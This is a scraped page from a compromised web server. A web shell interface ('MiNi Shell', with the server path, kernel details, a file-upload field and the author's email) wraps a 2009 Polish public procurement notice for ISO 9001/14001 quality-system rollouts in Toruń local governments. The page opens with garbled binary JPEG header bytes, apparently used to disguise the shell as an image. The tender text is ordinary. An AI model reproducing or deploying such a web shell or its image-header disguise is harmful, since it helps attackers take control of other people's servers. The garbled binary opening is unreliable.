JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090420/112032-N-2009.html

<p class="kh_header"><b>Toruń: Wdrożenie systemu zarządzania jakością zgodnego z PN ISO 9001 w 18 jednostkach samorządu terytorialnego oraz wdrożenie zintegrowanego systemu jakości zgodnego z PN ISO 9001 i PN ISO 14001 w 3 jednostkach samorządu terytorialnego</b><br>
<b>Numer ogłoszenia: 112032 - 2009; data zamieszczenia: 20.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Marszałkowski Województwa Kujawsko-Pomorskiego , Plac Teatralny 2, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 0-56 62 18 249, faks 56 62 18 347.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wdrożenie systemu zarządzania jakością zgodnego z PN ISO 9001 w 18 jednostkach samorządu terytorialnego oraz wdrożenie zintegrowanego systemu jakości zgodnego z PN ISO 9001 i PN ISO 14001 w 3 jednostkach samorządu terytorialnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest Wdrożenie systemu zarządzania jakością zgodnego z PN ISO 9001 w 18 jednostkach samorządu terytorialnego oraz wdrożenie zintegrowanego systemu jakości zgodnego z PN ISO 9001 i PN ISO 14001 w 3 jednostkach samorządu terytorialnego zwanego dalej systemem spełniające wymagania techniczne określone w Specyfikacji Technicznej stanowiącej załącznik nr 2 do  SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 72.26.30.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w kwocie 7.000,00 zł
2.	Wadium może być wniesione w jednej lub kilku następujących formach:
2.1	pieniądzu,
2.2	poręczeniach bankowych lub poręczenia spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
2.3	gwarancjach bankowych,
2.4	gwarancjach ubezpieczeniowych,
2.5	poręczeniach udzielanych przez podmioty, o których mowa w 6b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. nr 109, poz. 1158 z późn. zm.).
3.	Wadium w formie pieniężnej należy wpłacić przelewem na rachunek bankowy Zamawiającego:
                    Urząd Marszałkowski Województwa Kujawsko-Pomorskiego w Toruniu
                    Bank PKO BP S.A. 
                    konto nr    64 1020 5011 0000 9802 0119 5734. 
Nie dopuszcza się wpłacania wadium w kasie zamawiającego!
4.	Wadium wnoszone w formie: poręczenia bankowego, poręczenia spółdzielczej kasy oszczędnościowo-kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości, należy złożyć w formie oryginału w siedzibie Zamawiającego w Biurze Zamówień Publicznych - pok. 343 - P. Janusz Pawlak. Nie należy załączać oryginału dokumentu wadialnego do oferty przed terminem składania ofert.
5.	Z treści gwarancji (poręczenia) musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia 
i nazwiska).Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ustawy Prawo zamówień publicznych.
6.	Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert, tj. do dnia  28 kwietnia 2009 roku do godz. 11:00.
7.	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
8.	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
9.	Dyspozycję w zakresie zwrotu wadiów wniesionych przez Wykonawcę w pieniądzu wadiów, Zamawiający przekaże do banku niezwłocznie po: 
a)	upływie terminu związania ofertą,
b)	zawarciu umowy w sprawie zamówienia publicznego i wniesieniu zabezpieczenia należytego wykonania tej umowy,
c)	unieważnieniu postępowania o udzielenie niniejszego zamówienia publicznego, pod warunkiem, iż protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
 Zamawiający niezwłocznie dokona zwrotu wadium na wniosek Wykonawcy:
a)	który wycofał ofertę przed upływem terminu składania ofert,
b)	który został wykluczony z postępowania,
c)	którego oferta została odrzucona.
10.	Wadium Wykonawcy, którego oferta została wybrana, zostanie zatrzymane 
wraz z odsetkami w przypadku, gdy Wykonawca:
	a)	odmówi podpisania umowy na warunkach określonych w ofercie,
	b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
	c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O zamówienie mogą się ubiegać Wykonawcy, którzy:
1.1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, udokumentowane urzędowymi dokumentami z Krajowego Rejestru Sądowego lub ewidencji działalności gospodarczej, Krajowego Rejestru Karnego, Zakładu Ubezpieczeń Społecznych, Urzędu Skarbowego, o których mowa w rozdz. V pkt 1 niniejszej SIWZ,
1.2.	posiadają niezbędną wiedzę i doświadczenie do wykonywania zamówienia tj. w okresie ostatnich trzech lat przed wszczęciem niniejszego postępowania lub w okresie prowadzenia działalności, jeśli okres ten jest krótszy niż trzy lata, należycie wykonali minimum dwa, udokumentowane w formie wykazu, potwierdzone uzyskaniem certyfikatu, przez podmiot w którym wdrożenie przeprowadzono wdrożeń systemów zgodnych z wymaganiami normy ISO 9001 w wersji nie starszej niż 2000  i normy ISO 14001:2004, 
1.3.	dysponują niezbędnym potencjałem technicznym do wykonywania zamówienia 
i dysponują osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj. 
1.3.1.	w zakresie części szkoleniowej:
1.3.1.1.kadra szkoleniowa: Wykonawca zapewni lub przedstawi zobowiązania podmiotu trzeciego do udostępnienia na potrzeby wykonania zadania nie mniej niż 21 trenerów, spełniających wymagania określone w załączniku nr 5 do niniejszej SIWZ,
1.3.1.2.	kadra zarządzająca: Wykonawca zapewni lub przedstawi zobowiązania podmiotu trzeciego do udostępnienia na potrzeby wykonania zadania nie mniej niż 1 koordynatora części szkoleniowej spełniającego wymagania określone w załączniku nr 6 niniejszej SIWZ
1.3.2.w zakresie części wdrożeniowej: 
1.3.2.1.Kadra merytoryczna: Wykonawca zapewni lub przedstawi zobowiązania podmiotu trzeciego do udostępnienia na potrzeby wykonania zadania nie mniej niż 43 osób personelu wdrożeniowego, spełniających wymagania określone w załączniku nr 7 do niniejszej SIWZ,
1.3.2.2.Wykonawca zapewni lub przedstawi zobowiązania podmiotu trzeciego do udostępnienia na potrzeby wykonania zadania nie mniej niż 21 auditorów, spełniających wymagania określone w załączniku nr 8 do niniejszej SIWZ,
1.3.2.3.Kadra zarządzająca: Wykonawca zapewni lub przedstawi zobowiązania podmiotu trzeciego do udostępnienia na potrzeby wykonania zadania nie mniej niż 1 kierownika wdrożenia spełniającego wymagania określone w załączniku nr 9 do niniejszej SIWZ,

1.4.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
1.5.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust.1 
i 2 ustawy Prawo zamówień publicznych).
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia- nie spełnia, w oparciu o informacje zawarte w dokumentach wyszczególnionych w rozdziale V niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił. 
Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem  Wykonawcy z postępowania. 
2.	W przypadku wskazania w załączniku nr 3 do niniejszej SIWZ jakiegokolwiek zakresu, który Wykonawca powierzy podwykonawcy, Zamawiający zastrzega, iż wszelkie rozliczenia pomiędzy Wykonawcą a podwykonawcą dokonywane będą bez udziału Zamawiającego. Ewentualnym podwykonawcom nie przysługują żadne roszczenia z tego tytułu skierowane do Zamawiającego. Odpowiedzialność za należyte wykonanie zamówienia spoczywa tylko i wyłącznie na Wykonawcy.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać następujące dokumenty:
1.1	Formularz ofertowy wraz z zawartym w nim oświadczeniem Wykonawcy o spełnieniu warunków określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U. 2007 Nr 223, poz. 1655) którego treść zawarto w załączniku nr 1 do niniejszej SIWZ,
1.2	aktualny odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.3	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
1.4	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.5	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 (odpowiedzialność podmiotów zbiorowych) ustawy z dnia 29 stycznia 
2004 r. Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.6	wykaz przeprowadzonych wdrożeń,
1.7	 wykaz przeprowadzonych szkoleń - doświadczenie zawodowe w prowadzeniu szkoleń z zakresu wdrażania systemów zgodnych z wymaganiami normy ISO 9001 w wersji nie starszej niż 2000, z czego nie mniej niż 5 szkoleń, zgodnie z normą ISO 9001: 2008 lub PN EN ISO 9001:2009- 18 osób;
1.8	wykaz przeprowadzonych szkoleń  - doświadczenie zawodowe w prowadzeniu szkoleń z zakresu wdrażania systemów zgodnych z wymaganiami normy ISO 9001 w wersji nie starszej niż 2000, z czego nie mniej niż 5 szkoleń, zgodnie z normą ISO 9001: 2008 lub PN EN ISO 9001:2009 i normy ISO 14001:2004 - 3 osoby,
1.9	certyfikat, zaświadczenie lub świadectwo wystawione przez podmiot niezależny od wykonawcy stwierdzający, ze 18 trenerów posiada wiedze merytoryczną w zakresie wymagań normy ISO 9001:2008 lub PN EN ISO 9001:2009,
1.10	certyfikat, zaświadczenie  lub świadectwo wystawione przez podmiot niezależny od wykonawcy stwierdzający ze  3 trenerów posiada wiedzę merytoryczną w zakresie wymagań normy ISO 9001:2008 lub PN EN ISO 9001:2009 i normy ISO 14001:2004,
1.11	wykaz minimum 3 szkoleń o tej samej tematyce, prowadzonych jednocześnie u co najmniej 5 podmiotów,
1.12	certyfikat, zaświadczenie lub świadectwo wystawione przez podmiot niezależny od wykonawcy stwierdzające, że  40 osób posiada wiedze merytoryczną w zakresie wymagań normy ISO 9001:2008 lub PN EN ISO 9001:2009,
1.13	certyfikat, zaświadczenie  lub świadectwo wystawione  przez podmiot niezależny od wykonawcy stwierdzające że  3 osoby posiadają  wiedzy merytoryczną w zakresie wymagań normy ISO 9001:2008 lub PN EN ISO 9001:2009 i normy ISO 14001:2004,
1.14	udokumentowane uczestnictwo w skutecznym, to jest potwierdzonym uzyskaniem certyfikatu, wdrożeniu systemu zgodnego z wymaganiami normy ISO 9001 w wersji nie starszej niż 2000, w co najmniej 3 podmiotach zewnętrznych  - 20 osób, z czego co najmniej jedno wdrożenie u każdej z osób dotyczyło ISO 9001:2008 lub PN EN ISO 9001:2009.
1.15	udokumentowane uczestnictwo w skutecznym, to jest potwierdzonym uzyskaniem
             certyfikatu, wdrożeniu systemu zgodnego z wymaganiami normy ISO 9001w wersji nie starszej niż 2000, w co najmniej 3 podmiotach zewnętrznych, z czego co najmniej jedno wdrożenie u każdej z osób dotyczyło ISO 9001:2008 lub PN EN ISO 9001:2009  i normy ISO 14001 - 3 osoby, 
1.15    dokument potwierdzający posiadanie co najmniej rocznego doświadczenia zawodowego (     bez względu na formę współpracy) w samorządzie terytorialnym - 20 osób,
1.16	 certyfikat, zaświadczenie lub świadectwo wystawione przez podmiot niezależny od wykonawcy stwierdzający, że  18 osób posiada wiedze merytoryczną w zakresie prowadzenia auditów systemu spełniającego wymagania normy ISO 9001:2008 lub PN EN ISO 9001:2009,
1.17	certyfikat, zaświadczenie lub świadectwo wystawione przez podmiot niezależny od wykonawcy stwierdzające, że  3 osoby posiadają wiedzę merytoryczną w zakresie prowadzenia auditów systemu zintegrowanego, spełniającego wymagania wymagań normy ISO 9001:2008 lub PN EN ISO 9001:2009 i normy ISO 14001:2004,
1.18	Dokumenty potwierdzające posiadanie udokumentowanej wiedzy w zakresie prawnych warunków funkcjonowania samorządu terytorialnego (studia magisterskie na kierunku administracja, prawo lub studia podyplomowe: administracja publiczna, administracja samorządowa) 22 osoby, dyplom świadectwo ukończenia studiów podyplomowych auditorów i kierownika wdrożenia.

UWAGA:	 
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w niniejszym rozdziale w pkt 1 ppkt-y: 1.2, 1.3, 1.5 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a. 	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b. 	nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
- wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
c. 	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne 
i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
Zamiast dokumentu, o którym mowa w pkt 1 ppkt 1.4 składa się zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust.1 pkt 4-8 ustawy - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się ww. dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Wymagania w zakresie terminów wydania tych dokumentów stosuje się odpowiednio. 
2.	Do oferty Wykonawca dołącza, oprócz dokumentów, o których mowa w punkcie 1:
2.1. wypełniony formularz Wykaz podwykonawców w zakresie podwykonawstwa stanowiący załącznik Nr 3 do SIWZ, jeżeli Wykonawca zamierza powierzyć część zamówienia  (jego element) podwykonawcom, 
2.2. zaparafowany harmonogram realizacji projektu stanowiący załącznik  nr 4 do nieniejszej SIWZ.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kujawsko-pomorskie.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Kujawsko-Pomorskiego
Departament Administracji Wydział Zamówień Publicznych pok 338
Plac Teatralny 2 87-100 Toruń.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2009 godzina 11:00, miejsce: Urząd Marszałkowski Województwa Kujawsko-Pomorskiego
Departament Administracji Wydział Zamówień Publicznych pok 338
Plac Teatralny 2 87-100 Toruń.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> zamawiający nie przewiduje zawarcia umowy ramowej 
projekt Wdrożenie i certyfikacja systemu zarządzania jakością zgodnego z normą ISO w jednostkach samorządu terytorialnego z terenu województwa kujawsko-pomorskiego

Creat By MiNi SheLL
Email: jattceo@gmail.com